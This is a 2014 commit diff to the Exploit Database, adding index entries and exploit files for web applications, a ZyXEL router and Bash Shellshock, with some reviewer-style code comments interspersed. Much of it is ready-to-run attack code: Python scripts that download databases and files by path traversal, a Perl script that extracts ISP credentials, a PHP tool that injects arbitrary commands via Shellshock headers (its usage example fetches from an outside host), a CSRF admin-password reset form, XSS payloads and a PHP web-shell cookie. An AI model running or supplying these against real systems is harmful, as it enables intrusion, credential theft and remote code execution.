Updated 09_26_2014

Offensive Security 2014-09-26 04:44:01 +00:00
parent 8b9c29c462
commit dd094ab0a7
19 changed files with 1360 additions and 2 deletions


@ -31188,7 +31188,7 @@ id,file,description,date,author,platform,type,port
34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products 'escorts_search.php' Cross-Site Scripting Vulnerabilities",2010-09-15,"599eme Man",php,webapps,0
34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script 'category.php' SQL Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0
34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 4.3 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0
34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 3.4 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0
34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
34640,platforms/php/webapps/34640.txt,"Mollify 1.6 'index.php' Cross Site Scripting Vulnerability",2010-09-15,"John Leitch",php,webapps,0
34641,platforms/php/webapps/34641.py,"chillyCMS 2.3.4.3 Arbitrary File Upload Vulnerability",2010-09-15,"John Leitch",php,webapps,0
@ -31261,6 +31261,7 @@ id,file,description,date,author,platform,type,port
34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0
34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0
34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
34718,platforms/php/webapps/34718.txt,"M/Monit 3.3.2 - CSRF Vulnerability",2014-09-20,"Dolev Farhi",php,webapps,0
34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash Poc",2014-09-20,"niko sec",windows,dos,0
34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0
34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injection Vulnerabilities",2014-09-20,BillV-Lists,php,webapps,0
@ -31284,3 +31285,19 @@ id,file,description,date,author,platform,type,port
34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 'file' Parameter Local File Include Vulnerability",2014-09-23,Eolas_Gadai,php,webapps,0
34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection Vulnerability",2009-07-21,Moudi,php,webapps,0
34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 'admin_index.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80
34752,platforms/windows/dos/34752.c,"WS10 Data Server SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0
34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80
34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80
34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80
34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 Command Injection",2014-09-24,metasploit,windows,remote,3000
34757,platforms/windows/remote/34757.rb,"Advantech WebAccess dvs.ocx GetColor Buffer Overflow",2014-09-24,metasploit,windows,remote,0
34758,platforms/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Path Traversal LFI",2014-09-24,Securify,php,webapps,80
34759,platforms/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,php,webapps,80
34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Stored XSS",2014-09-24,"Kenneth F. Belva",php,webapps,80
34761,platforms/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Path Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80
34762,platforms/php/webapps/34762.txt,"Wordpress Login Widget With Shortcode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80
34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 (index.php, file param) - Local File Inclusion",2014-09-25,Netsparker,php,webapps,80
34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80
34765,platforms/linux/remote/34765.txt,"GNU bash Environment Variable Command Injection",2014-09-25,"Stephane Chazelas",linux,remote,0
34766,platforms/linux/remote/34766.php,"Bash Environment Variables Code Injection Exploit",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80


80
platforms/asp/webapps/34753.py Executable file

@ -0,0 +1,80 @@
#!/usr/bin/env python
#-*- coding:cp1254 -*-
# Title : Onlineon E-Ticaret Database Disclosure Exploit (.py)
# dork : inurl:"default.asp?git=sepet"
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Download : http://www.onlineonweb.com/eticaret.html
# Demo : http://ayvalikkokluzeytincilik.com
# date : 06/09/2014
# Python : V 2.7
# Thks : exploit-db.com and others
import sys, urllib2, re, os, time
def indiriyoruz(url):
import urllib
aldosyayi = urllib.urlopen(url)
indiraq = open(url.split('/')[-1], 'wb')
indiraq.write(aldosyayi.read())
aldosyayi.close()
indiraq.close()
if len(sys.argv) < 2:
os.system(['clear','cls'][1])
print " ____________________________________________________________________"
print "| |"
print "| Onlineon E-Ticaret Database Disclosure Exploit (.py) |"
print "| ZoRLu / milw00rm.com |"
print "| exploit.py http://site.com/path/ |"
print "|____________________________________________________________________|"
sys.exit(1)
''' link kontrol 1 '''
koybasina = "http://"
koykicina = "/"
sitemiz = sys.argv[1]
if sitemiz[-1:] != koykicina:
sitemiz += koykicina
if sitemiz[:7] != koybasina:
sitemiz = koybasina + sitemiz
database = "db/urun.mdb"
url2 = sitemiz + database
print "\n" + url2
print "\nlink check"
time.sleep(1)
''' link kontrol 2 '''
try:
adreskontrol = urllib2.urlopen(url2).read()
if len(adreskontrol) > 0:
print "\nGood Job Bro!"
except urllib2.HTTPError:
import os
import sys
print "\nForbidden Err0r, Security!"
sys.exit(1)
''' dosya indiriliyor '''
if __name__ == '__main__':
import sys
if len(sys.argv) == 2:
print "\nFile is Downloading\n"
try:
indiriyoruz(url2)
except IOError:
print '\nFilename not found.'
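Review bot: The `if __name__ == '__main__':` guard near the end protects only the download call; the argument check, the URL construction and the network request at `adreskontrol = urllib2.urlopen(url2).read()` all run at import time, so the guard isolates nothing and `url2` is an unbound name whenever the guard is false. The `except urllib2.HTTPError:` clause leaves `urllib2.URLError` (DNS failure, connection refused) uncaught, so a host that is simply down ends the script with a traceback instead of a message; `except (urllib2.HTTPError, urllib2.URLError):` covers both. The `len(adreskontrol) > 0` test also treats any 200 response with a body as success, so a site that serves a themed "not found" page with status 200 is reported as "Good Job Bro!". The `import os` / `import sys` lines inside the except body and under the guard duplicate the module-level import on the `import sys, urllib2, re, os, time` line.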


@ -0,0 +1,46 @@
#!/usr/bin/perl
# Exploit Author: Sebastián Magof
# Hardware: ZyXEL Prestig P-660HNU-T1
# Vulnerable file: wzADSL.asp
# location: http://gateway/cgi-bin/wzADSL.asp
# Bug: ISP usr+pwd disclosure
# Type: Local
# Date: 22/09/2014
# Vendor Homepage: http://www.zyxel.com/
# Version: 2.00(AAIJ.1)
# Tested on: Linux Fedora 20/Windows 7
# (\/)
# (**) Alpha (:
#(")(")
#usage:perl exploit.pl
use LWP::UserAgent;
use HTTP::Request;
#begin
print "\n\n************************************************************\n";
print "* ZyXEL Prestig MODELO P-660HNU-T1v2 local ISP usr+pwd *\n";#default gateway 192.168.1.1 (Arnet Telecom ISP Argentina)
print "************************************************************\n\n";#in oher country modify $url line 25
#isp pwd disclosure file
my $url = "http://192.168.1.1/cgi-bin/wzADSL.asp";
#UserAgent
my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0");
#Request.
my $req = HTTP::Request->new(GET => $url);
my $request = $ua->request($req);
my $content = $request->content(); #content
my ($usr) = $content =~ m/name="wan_UserName" size="30" maxlength="128" value="(.+)" >/;
my ($pwd) = $content =~ m/name="wan_Password" size="30" maxlength="128" value="(.+)">/;
#ISP usr+pwd Arnet Telecom Argentina;
print "User: $usr\n";
print "Password: $pwd\n\n";
exit(0);
__EOF__
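Review bot: `$request->content()` is consumed without checking `$request->is_success`, so when the gateway is unreachable or answers with an error page both regexes fail to match and the script prints empty `User:` / `Password:` lines as though they were real values; `die $request->status_line unless $request->is_success;` before the match makes that failure visible. The greedy `(.+)` in both patterns also runs past the closing quote when anything else follows on the same HTML line, whereas `([^"]*)` captures exactly the attribute value. The trailing `__EOF__` is not Perl's end-of-source marker (that is `__END__`) and is only harmless because `exit(0)` precedes it.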


@ -0,0 +1,15 @@
Exploit Database Note:
The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
this is a test


@ -0,0 +1,45 @@
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
Test CGI Code : #!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"
*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
}
$url = $x['u'];
$cmd = $x['c'];
$context = stream_context_create(
array(
'http' => array(
'method' => 'GET',
'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
)
)
);
if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)
die("Command sent to the server!\n");
else
die("Connection Error\n");
?>
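Review bot: The outcome test at `if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)` reports "Command sent" only for an empty body with a 500 status line and reports "Connection Error" for every other outcome, including a 200 response with content, so the two messages do not correspond to what actually happened; because `error_reporting(0)` is set, `$http_response_header` being undefined after a failed stream open is silently coerced rather than surfaced. A clearer split checks `isset($http_response_header)` first and prints the real status line in both branches. From a monitoring standpoint, the `'header' => 'User-Agent: () { :;}; ...'` value is the literal CVE-2014-6271 pattern and is written verbatim into the web server's access log, which is the obvious place to detect this probe.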


@ -1,6 +1,6 @@
######################
# Exploit Title : Joomla Spider Form Maker <= 4.3 SQLInjection
# Exploit Title : Joomla Spider Form Maker <= 3.4 SQL Injection
# Exploit Author : Claudio Viviani

24
platforms/php/webapps/34718.txt Executable file

@ -0,0 +1,24 @@
Vulnerability title: M/Monit CSRF Author: Dolev Farhi Contact: dolevf at
openflare dot com @dolevff Application: M/Monit 3.2.2 Date: 13.9.2014
Relevant CVEs: N/A Vulnerable version: <= 3.2.2 Fixed version: N/A 1.
About the application ------------------------ Easy, proactive
monitoring of Unix systems, network and cloud services. Conduct
automatic maintenance and recovery and execute meaningful causal actions
in error situations M/Monit expand on Monit's capabilities and provides
monitoring and management of all your Monit enabled hosts via a modern,
clean and well designed user interface which also works on mobile
devices. 2. Vulnerabilities Descriptions: -----------------------------
It was found that M/Monit latest version is vulnerable to CSRF attacks.
it is possible to reset the password of any user account (admin/regular)
on the system without needing to know the current set password for the
attacked account. 3. Proof of concept exploit
---------------------------- <html> <! -- CSRF PoC for M/Monit --> <div
align="center"> <pre> <h2><b> CSRF PoC for M/monit <b></h2> <body>
<form action="http://mmonit_server:8080/admin/users/update"
method="POST"> <input type="hidden" name="fullname"
value="Administrator" /> <input type="hidden" name="password"
value="Attacker_Passw0rd" /> <input type="hidden" name="email"
value="attacker@email.com" /> <input type="hidden" name="admin"
value="on" /> <input type="hidden" name="uname" value="admin" /> <input
type="submit" name="submit" value="Attack" /> </form> </body> </div>
</html>

114
platforms/php/webapps/34754.py Executable file

@ -0,0 +1,114 @@
######################
# Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://www.apptha.com
# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150
# Dork Google: inurl:option=com_facegallery
# Date : 2014-09-17
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Info:
# Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file dowwnload vulnerabilities
# PoC Exploit:
#
# http://localhost/index.php?option=com_facegallery&view=images&aid=[SQLi]&lang=en
# http://localhost/index.php?option=com_facegallery&task=imageDownload&img_name=[../../filename]
# "aid" and img_name variables are not sanitized.
######################
# Arbitrary file download exploit:
#!/usr/bin/env python
# http connection
import urllib, urllib2
# Args management
import optparse
# Error managemen
import sys
banner = """
__ __ _______
|__.-----.-----.--------| .---.-. | _ .---.-.----.-----.
| | _ | _ | | | _ | |. 1___| _ | __| -__|
| |_____|_____|__|__|__|__|___._| |. __) |___._|____|_____|
|___| |: |
|::.|
`---'
_______ __ __ _____ _______
| _ .---.-| | .-----.----.--.--. | _ | | _ |
|. |___| _ | | | -__| _| | | |.| |__|. | |
|. | |___._|__|__|_____|__| |___ | `-|. |__|. | |
|: 1 | |_____| |: | |: 1 |
|::.. . | |::.| |::.. . |
`-------' `---' `-------'
j00ml4 F4c3 G4ll3ry 4rb1tr4ry F1l3 D0wnl04d
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
def connection(url,pathtrav):
try:
response = urllib2.urlopen(url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php')
content = response.read()
if content != "":
print '[!] VULNERABLE'
print '[+] '+url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php'
else:
print '[X] Not Vulnerable'
except urllib2.HTTPError:
print '[X] HTTP Error'
except urllib2.URLError:
print '[X] Connection Error'
commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
pathtrav = "../../"
connection(url,pathtrav)
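Review bot: The `#!/usr/bin/env python` line sits after the comment banner rather than on line 1, so although the file is marked executable the kernel will not honour it as a shebang; the same applies to 34755.py, where the interpreter line is the last line of the header block. In `connection()` any non-empty response body is reported as `[!] VULNERABLE`, so a site that answers the download URL with a 200 HTML page (a themed "not found" page or a login form) produces a false positive; the check needs a stronger criterion than a non-empty body before it calls the target vulnerable. `urllib` is imported but never used in either script, and `checkurl()` compares the scheme prefix case-sensitively, so `HTTP://host` is rejected with the protocol error.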

112
platforms/php/webapps/34755.py Executable file

@ -0,0 +1,112 @@
######################
# Exploit Title : Joomla Mac Gallery <= 1.5 Arbitrary File Download
# Exploit Author : Claudio Viviani
# Vendor Homepage : https://www.apptha.com
# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/18
# Dork Google: inurl:option=com_macgallery
# Date : 2014-09-17
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Info:
# Joomla Mac Gallery suffers from Arbitrary File Download vulnerability
# PoC Exploit:
#http://localhost/index.php?option=com_macgallery&view=download&albumid=[../../filename]
#"album_id" variable is not sanitized.
######################
#!/usr/bin/env python
# http connection
import urllib, urllib2
# Args management
import optparse
# Error managemen
import sys
banner = """
__ __ ___ ___
|__.-----.-----.--------| .---.-. | Y .---.-.----.
| | _ | _ | | | _ | |. | _ | __|
| |_____|_____|__|__|__|__|___._| |. \_/ |___._|____|
|___| |: | |
|::.|:. |
`--- ---'
_______ __ __ _____ _______
| _ .---.-| | .-----.----.--.--. | _ | | _ |
|. |___| _ | | | -__| _| | | |.| |__| 1___|
|. | |___._|__|__|_____|__| |___ | `-|. |__|____ |
|: 1 | |_____| |: | |: 1 |
|::.. . | |::.| |::.. . |
`-------' `---' `-------'
j00ml4 M4c G4ll3ry <= 1.5 4rb1tr4ry F1l3 D0wnl04d
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
def connection(url,pathtrav):
try:
response = urllib2.urlopen(url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php')
content = response.read()
if content != "":
print '[!] VULNERABLE'
print '[+] '+url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php'
else:
print '[X] Not Vulnerable'
except urllib2.HTTPError:
print '[X] HTTP Error'
except urllib2.URLError:
print '[X] Connection Error'
commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
pathtrav = "../../"
connection(url,pathtrav)

84
platforms/php/webapps/34758.txt Executable file

@ -0,0 +1,84 @@
------------------------------------------------------------------------
Glype proxy cookie jar path traversal allows code execution
------------------------------------------------------------------------
Securify, September 2014
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A path traversal vulnerability has been identified in the Glype
web-based proxy that allows an attacker to run arbitrary PHP code on the
server or to remove critical files from the filesystem. This only
affects servers that are configured to:
- store Glype cookies locally; AND
- disable PHP display_errors; AND
- allow the webserver process to write to the filesystem (document
root).
------------------------------------------------------------------------
Affected versions
------------------------------------------------------------------------
This issue has been identified in Glype 1.4.9. Older version are most
likely affected as well.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Glype was informed and a fixed version (1.4.10) is now available at
www.glype.com
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html
File creation via path traversal
When the "Store cookies on server" option is set in admin.php, Glype will create a cookie jar on the server to store a user's cookies. The filename for the cookie jar is created using the user's session ID.
browse.php
$toSet[CURLOPT_COOKIEFILE] = $toSet[CURLOPT_COOKIEJAR] = $CONFIG['cookies_folder'] . session_id();
PHP takes this session ID from a cookie, so the value returned by session_id() is under control of the user. By using path traversal a user can overwrite or create any file on the server with the rights of the webserver's system user.
Code execution
As a POC the following steps were taken to create and run a malicious PHP file in the webroot:
1. Glype was installed with the "Store cookies on server" option set in admin.php. The cookie directory remained default (tmp/cookies/).
2. A request was initiated with the Glype session cookie's value set to "../../test.php".
3. The Glype proxy was used to surf to a Securify controlled domain that returned a header that set a cookie containing a malicious PHP script.
Set-Cookie: TestCookie=<?php echo shell_exec($_GET['cmd']) ?>; expires=Thu, 31-Aug-2014 19:14:10 GMT
This caused Glype to write this PHP backdoor to test.php in the webroot. When requested using a browser, PHP parses the cookie jar file containing the malicious PHP code.
The following Python code can be used as a simple test to verify if your Glype installation is affected:
import urllib2
server = 'http://<glype server>'
url = '/browse.php?u=http%3A%2F%2Fwww.glype.com&b=28'
req = urllib2.Request(server + url)
req.add_header('Referer', server)
req.add_header('Cookie', 's=../securify')
r = urllib2.urlopen(req)
You are affected if a file named "securify" is created outside of the cookie directory.
Arbitrary file removal
The following code is affected by a (similar) path traversal vulnerability allowing an attacker to remove any file the HTTP process has access to:
includes/process.php
# Look for cookie file and check writable
if ( is_writable($file = $CONFIG['cookies_folder'] . session_id()) ) {
# Delete it
unlink($file);
}
This can for example be exploited to put a Glype server out of service or to clear log files.

54
platforms/php/webapps/34759.txt Executable file

@ -0,0 +1,54 @@
------------------------------------------------------------------------
Glype proxy local address filter bypass
------------------------------------------------------------------------
Securify, September 2014
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A vulnerability has been identified in the Glype web-based proxy. Glype
has a filter to disallow users from surfing to local addresses, to
prevents users from attacking the local server/network Glype is running
on. The filter can easily be bypassed by using IPs in decimal form.
------------------------------------------------------------------------
Affected versions
------------------------------------------------------------------------
This issue has been identified in Glype 1.4.9. Older version are most
likely affected as well.
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Glype was informed and a fixed version (1.4.10) is now available at
www.glype.com
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html
Glype local address bypass
Glype uses the following code (regex) to filter out internal/local addresses. This is intended to prevent proxy users from attacking local/internal resources through Glype.
browse.php
# Protect LAN from access through proxy (protected addresses copied from PHProxy)
if ( preg_match('#^(?:127\.|192\.168\.|10\.|172\.(?:1[6-9]|2[0-9]|3[01])\.|localhost)#i', $URL['host']) ) {
error('banned_site', $URL['host']);
}
This regex can easily be bypassed by using a decimal format IP address, which allows an attacker to browse/attack the internal server/network Glype is running on.
For example, if a server running Glype also runs phpmyadmin or another admin panel on local host, browsing to http://2130706433/phpmyadmin (2130706433 equals 127.0.0.1 in decimal) causes Glype to create a local connection to phpmyadmin, allowing remote access. Other internal web pages running on the internal network could be accessed like this as well.
Possible fix
Resolving the hostname using PHPs gethostbyname before using the regular expression will eliminate this bypass.
$URL['host'] = gethostbyname($URL['host]);
# Protect LAN from access through proxy (protected addresses copied from PHProxy)
if ( preg_match('#^(?:127\.|192\.168\.|10\.|172\.(?:1[6-9]|2[0-9]|3[01])\.|localhost)#i', $URL['host']) ) {
error('banned_site', $URL['host']);
}
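Review bot: The code under "Possible fix" has a syntax error: `$URL['host'] = gethostbyname($URL['host]);` is missing the closing quote in the argument, so the line as printed will not parse. Beyond that, `gethostbyname()` returns the unmodified hostname when resolution fails and handles IPv4 only, so the subsequent regex still sees unresolved names and never sees IPv6 literals such as the loopback address; the regex itself also omits `0.0.0.0` and the `169.254.0.0/16` link-local range. A more robust mitigation resolves the name, validates every returned address with `filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)`, and then connects to the validated address rather than re-resolving the name, so a DNS answer cannot change between the check and the connection.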

29
platforms/php/webapps/34760.txt Executable file

@ -0,0 +1,29 @@
Title: Pizza Inn Registration Stored XSS
Severity: High
CVE-ID: CVE-2014-6619
Release Date: 20 September 2014
Author: Kenneth F. Belva
Websites: http://silverbackventuresllc.com
http://xssWarrior.com
http://securitymaverick.com
Twitter: @infosecmaverick
Contact: Please use website contact form.
Mail:
URL: http://sourceforge.net/projects/restaurantmis/
Vendor:
Remote Exploit: Yes
Discovered with: xssWarrior - http://xssWarrior.com
Description:
============
On registration the XSS code will be stored in the database. When the administrator views the new sign-ups it will execute.
Proof of Concept :
==================
http://[domain]/PizzaInn/register-exec.php
fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register

55
platforms/php/webapps/34761.txt Executable file

@ -0,0 +1,55 @@
Advisory ID: HTB23227
Product: webEdition
Vendor: webEdition e.V.
Vulnerable Version(s): 6.3.8.0 (SVN-Revision: 6985) and probably prior
Tested Version: 6.3.8.0 (SVN-Revision: 6985)
Advisory Publication: August 6, 2014 [without technical details]
Vendor Notification: August 6, 2014
Vendor Patch: September 4, 2014
Public Disclosure: September 17, 2014
Vulnerability Type: Path Traversal [CWE-22]
CVE Reference: CVE-2014-5258
Risk Level: Medium
CVSSv2 Base Score: 4 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in webEdition, which can be exploited to read arbitrary files on the target system.
1) Path Traversal in webEdition: CVE-2014-5258
The vulnerability exists due to insufficient sanitization of the "file" HTTP GET parameter in "/webEdition/showTempFile.php" script. A remote authenticated user can send a specially crafted HTTP GET request containing directory traversal sequences (e.g. "../") and read contents of arbitrary files on the target system with privileges of the web server.
The exploitation example below display contents of "/etc/passwd" file:
http://[host]/webEdition/showTempFile.php?file=../../../../etc/passwd
Successful exploitation of the vulnerability requires valid user credentials. Registration is not open by default and all user accounts are created by the administrator of the web application.
-----------------------------------------------------------------------------------------------
Solution:
Update to webEdition 6.3.9 Beta
More Information:
http://www.webedition.org/de/aktuelles/webedition-cms/webEdition-6.3.9-Beta-erschienen
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23227 - https://www.htbridge.com/advisory/HTB23227 - Path Traversal in webEdition.
[2] webEdition - http://www.webedition.org - is a Content Management System.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

52
platforms/php/webapps/34762.txt Executable file

@ -0,0 +1,52 @@
Details
================
Software: Login Widget With Shortcode
Version: 3.1.1
Homepage: http://wordpress.org/plugins/login-sidebar-widget/
Advisory report: https://security.dxw.com/advisories/csrfxss-vulnerablity-in-login-widget-with-shortcode-allows-unauthenticated-attackers-to-do-anything-an-admin-can-do/
CVE: Awaiting assignment
CVSS: 6.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:P)
Description
================
CSRF/XSS vulnerablity in Login Widget With Shortcode allows unauthenticated attackers to do anything an admin can do
Vulnerability
================
This plugin is vulnerable to a combination CSRF/XSS attack. An attacker able to convince an admin to visit a link of their choosing is able to insert arbitrary HTML into an admin page. Using that ability they can use JavaScript to control an admin users browser, allowing the attacker to create user accounts, create posts, delete all posts, etc.
Proof of concept
================
If a logged-in administrator user clicks the submit button on this form, a javascript alert will display in the admin screens. (In a real attack the form can be made to auto-submit using Javascript).
<form method=\"POST\" action=\"http://localhost/wp-admin/options-general.php?page=login_widget_afo\">
<input type=\"text\" name=\"custom_style_afo\" value=\"&lt;/textarea&gt;<script>alert(1)</script>\">
<input type=\"text\" name=\"option\" value=\"login_widget_afo_save_settings\">
<input type=\"submit\">
</form>
Mitigations
================
Upgrade to version 3.2.1 or later.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report with 14 days.
Timeline
================
2014-08-26: Discovered
2014-09-15: Reported to vendor by email
2014-09-15: Vendor reported the issue fixed and a new version released
2014-09-17: Published
Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.

49
platforms/php/webapps/34763.txt Executable file

@ -0,0 +1,49 @@
Information
-----------
Advisory by Netsparker.
Name : LFI Vulnerability in OsClass
Affected Software : OsClass
Affected Versions: 3.4.1 and possibly below
Vendor Homepage : http://osclass.org/
Vulnerability Type : Local File Inclusion
Severity : Critical
CVE-ID: CVE-2014-6308
Netsparker Advisory Reference : NS-14-031
Advisory URL
------------
https://www.netsparker.com/lfi-vulnerability-in-osclass/
Description
-----------
Local file inclusion vulnerability where discovered in Osclass, an
open source project that allows you to create a classifieds sites.
Technical Details
-----------------
Proof of Concept URL for LFI in OsClass:
http://example.com/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd
Advisory Timeline
-----------------
03/09/2014 - First Contact
03/09/2014 - Vulnerability fixed:
